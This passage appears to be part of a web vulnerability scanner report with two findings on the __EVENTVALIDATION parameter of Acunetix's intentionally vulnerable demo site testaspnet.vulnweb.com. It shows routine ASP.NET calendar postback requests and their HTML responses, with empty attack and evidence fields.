built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1183 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,183 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8279&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA1Omsi9oIHgJTRBYBBgCA1Omsi9oIZGRkxLX89XDHYaZ%2F2Ja3%2FuiYGPrp0F0%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLdptaiCQLtiZ78CwLHkIz%2BDgKK%2BZ%2FNDAKK%2BZ%2FNDAKK%2BbPgBQKK%2BbPgBQKK%2BaeHDQKK%2BaeHDQKK%2BZvsCwKK%2BZvsCwKK%2BY%2BDAwKK%2BY%2BDAwK%2Fk%2FvECQK%2Fk%2FvECQK%2Fk%2B%2BbAQK%2Fk%2B%2BbAQK%2Fk4O%2BCgK%2Fk4O%2BCgK%2Fk7fVAwK%2Fk7fVAwK%2Fk6voDAK%2Fk6voDAK%2Fk9%2BMBAK%2Fk9%2BMBAK%2Fk%2FOjDQK%2Fk%2FOjDQK%2Fk%2BfGBgK%2Fk%2BfGBgK%2Fk9uvAwK%2Fk9uvAwK%2Fk8%2FCDAK%2Fk8%2FCDAKQutnrDwKQutnrDwKQus2OBwKQus2OBwKQuuElApC64SUCkLqV%2BAkCkLqV%2BAkCkLqJnwECkLqJnwECkLq9sgoCkLq9sgoCkLrR1gMCkLrR1gMCkLrF7QwCkLrF7QwCkLq51QkCkLq51QkCkLqt6AICkLqt6AIC19nsngcC19nsngcC19mANQLX2YA1AtfZtMgJAtfZtMgJAtfZqO8CAtfZqO8CAtfZ3IMKAtfZ3IMKAtfZ8KYDAtfZ8KYDAtfZ5P0MAtfZ5P0MAtfZmJAEAtfZmJAEAtfZzPkCAtfZzPkCAtfZ4JwKAtfZ4JwKAqjg8oUNAqjg8oUNAqjg5tgGAqjg5tgGAqjgmv8PAqjgmv8PAqjgjpIHAqjgjpIHAqjgoikCqOCiKQKo4NbNCQKo4NbNCQKo4MrgAgKo4MrgAqiSrUvVjyjaFmblmwNwqatOXrWM
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:50:41 GMT Content-Length: 12635
Response Body - size: 12,635 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA1Omsi9oIHgJTRBYBBgCA1Omsi9oIZGRkxLX89XDHYaZ/2Ja3/uiYGPrp0F0=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLdptaiCQLtiZ78CwLHkIz+DgKK+Z/NDAKK+Z/NDAKK+bPgBQKK+bPgBQKK+aeHDQKK+aeHDQKK+ZvsCwKK+ZvsCwKK+Y+DAwKK+Y+DAwK/k/vECQK/k/vECQK/k++bAQK/k++bAQK/k4O+CgK/k4O+CgK/k7fVAwK/k7fVAwK/k6voDAK/k6voDAK/k9+MBAK/k9+MBAK/k/OjDQK/k/OjDQK/k+fGBgK/k+fGBgK/k9uvAwK/k9uvAwK/k8/CDAK/k8/CDAKQutnrDwKQutnrDwKQus2OBwKQus2OBwKQuuElApC64SUCkLqV+AkCkLqV+AkCkLqJnwECkLqJnwECkLq9sgoCkLq9sgoCkLrR1gMCkLrR1gMCkLrF7QwCkLrF7QwCkLq51QkCkLq51QkCkLqt6AICkLqt6AIC19nsngcC19nsngcC19mANQLX2YA1AtfZtMgJAtfZtMgJAtfZqO8CAtfZqO8CAtfZ3IMKAtfZ3IMKAtfZ8KYDAtfZ8KYDAtfZ5P0MAtfZ5P0MAtfZmJAEAtfZmJAEAtfZzPkCAtfZzPkCAtfZ4JwKAtfZ4JwKAqjg8oUNAqjg8oUNAqjg5tgGAqjg5tgGAqjgmv8PAqjgmv8PAqjgjpIHAqjgjpIHAqjgoikCqOCiKQKo4NbNCQKo4NbNCQKo4MrgAgKo4MrgAqiSrUvVjyjaFmblmwNwqatOXrWM" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">September 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8309')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8275')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8276')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8277')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8278')" style="color:Black" title="August 31">31</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8279')" style="color:White" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8280')" style="color:Black" title="September 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8281')" style="color:Black" title="September 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8282')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8283')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8284')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8285')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8286')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8287')" style="color:Black" title="September 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8288')" style="color:Black" title="September 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8289')" style="color:Black" title="September 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8290')" style="color:Black" title="September 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8291')" style="color:Black" title="September 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8292')" style="color:Black" title="September 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8293')" style="color:Black" title="September 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8294')" style="color:Black" title="September 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8295')" style="color:Black" title="September 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8296')" style="color:Black" title="September 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8297')" style="color:Black" title="September 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8298')" style="color:Black" title="September 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8299')" style="color:Black" title="September 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8300')" style="color:Black" title="September 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8301')" style="color:Black" title="September 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8302')" style="color:Black" title="September 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8303')" style="color:Black" title="September 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8304')" style="color:Black" title="September 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8305')" style="color:Black" title="September 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8306')" style="color:Black" title="September 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8307')" style="color:Black" title="September 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8308')" style="color:Black" title="September 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8309')" style="color:Black" title="October 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8310')" style="color:Black" title="October 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8311')" style="color:Black" title="October 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8312')" style="color:Black" title="October 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8313')" style="color:Black" title="October 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8314')" style="color:Black" title="October 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8315')" style="color:Black" title="October 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8316')" style="color:Black" title="October 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1165 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,165 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8553&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmiQzYtsIHgJTRBYBBgAABE%2F8YtsIZGRkABGdahfC3zRxZAnR6JiNc2PpFq8%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLdv6iqBgK1zpjCCwKqztDzBAL7pP2sCQL7pP2sCQL7pJHDAgL7pJHDAgLcy%2BPoBQLcy%2BPoBQLcy5ePDQLcy5ePDQLcy4uiBgLcy4uiBgLcy7%2F5DwLcy7%2F5DwLcy9OdBwLcy9OdBwLcy8cwAtzLxzAC3Mv71wkC3Mv71wkC3Mvv6gIC3Mvv6gIC3MvD0w8C3MvD0w8C3Mv39ggC3Mv39ggCsdLBnwoCsdLBnwoCsdL1sgMCsdL1sgMCsdLpyQwCsdLpyQwCsdKd7AUCsdKd7AUCsdKxgw0CsdKxgw0CsdKlpgYCsdKlpgYCsdLZ%2Bg8CsdLZ%2Bg8CsdLNkQcCsdLNkQcCsdKh%2BQUCsdKh%2BQUCsdLVnQ0CsdLVnQ0CivmnBQKK%2BacFAor529kJAor529kJAor5z%2FwCAor5z%2FwCAor545MKAor545MKAor5l7YDAor5l7YDAor5i80MAor5i80MAor5v%2BAFAor5v%2BAFAor504QNAor504QNAor5h%2BwLAor5h%2BwLAor5u4MDAor5u4MDAr%2BT58QJAr%2BT58QJAr%2BTm5sBAr%2BTm5sBAr%2BTj74KAr%2BTj74KAr%2BTo9UDAr%2BTo9UDAr%2BT1%2BkMAr%2BT1%2BkMAr%2BTy4wEAr%2BTy4wEAr%2BT%2F6MNAr%2BT%2F6MNAr%2BTk8YGAr%2BTk8YGAr%2BTx68DAr%2BTx68DAr%2BT%2B8IMAr%2BT%2B8IMUhUaV7LKjCM0cs%2BFAqQEypaMYug%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:08:00 GMT Content-Length: 12448
Response Body - size: 12,448 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmiQzYtsIHgJTRBYBBgAABE/8YtsIZGRkABGdahfC3zRxZAnR6JiNc2PpFq8=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLdv6iqBgK1zpjCCwKqztDzBAL7pP2sCQL7pP2sCQL7pJHDAgL7pJHDAgLcy+PoBQLcy+PoBQLcy5ePDQLcy5ePDQLcy4uiBgLcy4uiBgLcy7/5DwLcy7/5DwLcy9OdBwLcy9OdBwLcy8cwAtzLxzAC3Mv71wkC3Mv71wkC3Mvv6gIC3Mvv6gIC3MvD0w8C3MvD0w8C3Mv39ggC3Mv39ggCsdLBnwoCsdLBnwoCsdL1sgMCsdL1sgMCsdLpyQwCsdLpyQwCsdKd7AUCsdKd7AUCsdKxgw0CsdKxgw0CsdKlpgYCsdKlpgYCsdLZ+g8CsdLZ+g8CsdLNkQcCsdLNkQcCsdKh+QUCsdKh+QUCsdLVnQ0CsdLVnQ0CivmnBQKK+acFAor529kJAor529kJAor5z/wCAor5z/wCAor545MKAor545MKAor5l7YDAor5l7YDAor5i80MAor5i80MAor5v+AFAor5v+AFAor504QNAor504QNAor5h+wLAor5h+wLAor5u4MDAor5u4MDAr+T58QJAr+T58QJAr+Tm5sBAr+Tm5sBAr+Tj74KAr+Tj74KAr+To9UDAr+To9UDAr+T1+kMAr+T1+kMAr+Ty4wEAr+Ty4wEAr+T/6MNAr+T/6MNAr+Tk8YGAr+Tk8YGAr+Tx68DAr+Tx68DAr+T+8IMAr+T+8IMUhUaV7LKjCM0cs+FAqQEypaMYug=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8521')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">June 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8582')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8548')" style="color:Black" title="May 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8549')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8550')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8551')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8552')" style="color:Black" title="June 01">1</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8553')" style="color:White" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8554')" style="color:Black" title="June 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8555')" style="color:Black" title="June 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8556')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8557')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8558')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8559')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8560')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8561')" style="color:Black" title="June 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8562')" style="color:Black" title="June 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8563')" style="color:Black" title="June 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8564')" style="color:Black" title="June 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8565')" style="color:Black" title="June 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8566')" style="color:Black" title="June 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8567')" style="color:Black" title="June 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8568')" style="color:Black" title="June 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8569')" style="color:Black" title="June 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8570')" style="color:Black" title="June 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8571')" style="color:Black" title="June 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8572')" style="color:Black" title="June 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8573')" style="color:Black" title="June 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8574')" style="color:Black" title="June 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8575')" style="color:Black" title="June 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8576')" style="color:Black" title="June 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8577')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8578')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8579')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8580')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8581')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8582')" style="color:Black" title="July 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8583')" style="color:Black" title="July 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8584')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8585')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8586')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8587')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8588')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8589')" style="color:Black" title="July 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div 